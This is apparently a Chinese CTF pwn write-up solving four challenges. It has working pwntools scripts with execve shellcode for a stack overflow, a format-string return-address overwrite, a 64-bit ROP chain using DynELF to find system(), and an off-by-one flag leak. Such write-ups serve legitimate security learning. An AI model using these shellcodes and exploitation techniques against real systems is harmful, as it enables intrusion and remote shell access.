80pts:
栈溢出,gdb调试发现发送29控制eip,nx:disabled,所以布置好shellcode后getshell
from pwn import * #p=process('./tc1') p=remote('106.75.9.11',20000) nop='\x90'*19 buf='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' payload=p32(0x804a0a0+4)+nop+buf p.recvuntil('4. Divide\n') #gdb.attach(p) p.sendline('29') p.recvuntil('[123 110]\n') p.sendline(payload) p.interactive()
100pts:
反编译看出漏洞为格式化字符串,nx:disabled,思路就是在栈上布置shellcode,但是限定输入长度16bytes,所以得先修改read size。分三步利用:第一次泄漏栈地址,第二次修改参数(大于511即可),第三次修改ret地址,注意栈地址偏大,一次写入不行,思考很久,分两次写入,第一次通过%$hn先写两字节,第二次通样在+2偏移处写两字节就能成功写栈上shellcode地址到printf的ret处,改变执行流程getshell。(这题才100points,不应该啊:( )
int __cdecl main(int argc, const char **argv, const char **envp) { signed int v3; // eax@2 signed int v6; // [sp+10h] [bp-210h]@1 int v7; // [sp+1Ch] [bp-204h]@4 int v8; // [sp+21Ch] [bp-4h]@1 v8 = *MK_FP(__GS__, 20); v6 = 16; setvbuf(stdout, 0, 2, 0); ssignal(14, tooslow); alarm(20); while ( 1 ) { v3 = 511; if ( v6 <= 511 ) v3 = v6; v6 = v3; printf("Reading %d bytes\n", v3); read_until(&v7, v6, 10); printf((const char *)&v7);//格式化漏洞 putchar(10); alarm(20); } }
.text:0804F5A0 sub esp, 1Ch ; Alternative name is '_IO_printf' .text:0804F5A3 lea eax, [esp+1Ch+arg_4] .text:0804F5A7 mov [esp+1Ch+var_14], eax .text:0804F5AB mov eax, [esp+1Ch+arg_0] .text:0804F5AF mov [esp+1Ch+var_18], eax .text:0804F5B3 mov eax, stdout .text:0804F5B8 mov [esp+1Ch+var_1C], eax .text:0804F5BB call vfprintf .text:0804F5C0 add esp, 1Ch .text:0804F5C3 retn ;需要控制printf函数的ret .text:0804F5C3 printf endp
#!/usr/bin/env python from pwn import * import binascii #p = process('./echo-200') p = remote("106.75.9.11", '20001') #........leak stack........ payload1='%x%x%x%x%x' print p.recvuntil('bytes\n') p.sendline(payload1) print p.recvuntil('10a010') adr=p.recvuntil('\n').split('\n')[0] #........caculate address........ v=int(adr,16) print hex(v) addr=p32(v-0xc) ebp=int(adr,16)+0x20c k=v-0x20 q=v+0x20 c1=(q>>16) & 0xffff c2=q & 0xffff #........change the buf size........ p.recvuntil('bytes\n') payload2=addr+'%510x'+'%7$hn' p.sendline(payload2) #........change ret address to excute shellcode........ buf = "" buf += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x89\xe0\xdd\xc7\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x70\x6a\x74\x4b\x62" buf += "\x78\x5a\x39\x72\x72\x62\x46\x35\x38\x46\x4d\x42\x43" buf += "\x4b\x39\x69\x77\x43\x58\x56\x4f\x54\x33\x45\x38\x37" buf += "\x70\x63\x58\x54\x6f\x45\x32\x62\x49\x30\x6e\x4c\x49" buf += "\x6b\x53\x71\x42\x5a\x48\x73\x38\x75\x50\x47\x70\x43" buf += "\x30\x74\x6f\x65\x32\x50\x69\x50\x6e\x66\x4f\x54\x33" buf += "\x32\x48\x43\x30\x42\x77\x56\x33\x6c\x49\x38\x61\x78" buf += "\x4d\x6f\x70\x41\x41" #gdb.attach(p) payload3=p32(k)+p32(k+2)+'%%%dx'%(c2-4)+'%7$hn'+'%%%dx'%(c1-c2-4)+'%8$hn'+buf p.recvuntil('bytes\n') print "payload3:"+payload3 p.sendline(payload3) p.interactive()
200pts:
64位程序的rop、dynelf的利用,和32位有区别,注意寄存器(rdi,rsi,rdx)传参,leak的大小需要精准才能成功getshell(原理参考:http://www.purpleroc.com/md/2016-02-25@Thinking-About-Level2.html),泄漏system地址,传参getshell:
from pwn import * e = ELF('./qwb3') p=process('./qwb3') #p=remote('106.75.8.230',19286) poprdi = 0x400633 poprsi = 0x400631 # pop rsi; pop r15; ret = 0x400631 plt_write = e.symbols['write'] plt_read = e.symbols['read'] main = 0x40059d junk = 'A' * 8 data = 0x601048 def leak_write(addr): global p p.recvuntil('pwn \n') payload = 'A' * 72 + p64(poprdi) + p64(1) + p64(poprsi) + p64(addr) + junk +p64(plt_write) + p64(main) p.send(payload.ljust(0x190, 'A')) ret = p.recv(40) return ret d = DynELF(leak_write,elf=ELF('./qwb3')) system = d.lookup('system','libc') print system print p.recvuntil('pwn \n') payload2 = 'A' * 72 + p64(poprdi) + p64(0) + p64(poprsi) + p64(data) + junk + p64(plt_read) + p64(poprdi) + p64(data) + p64(system) print "\n###sending payload2 ...###" p.send(payload2) #sleep(1) #gdb.attach(p) p.send('/bin/sh\0') p.interactive()
300pts:
一开始无从下手,仔细想想,既然题目是leak,所以利用方式还是围绕输入来吧,限定了输入大小40,各种试溢出,试格式化字符串,最后输入name为'a'*40,flag为任一字符时可泄漏第一字节,第二次name不变,flag为第一次泄漏的字符加任一字符,泄漏第二个字符,以此类推得到flag,可以看出是off-by-one。
FLAG{wh4t3v3r_1s_0k}
1612
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
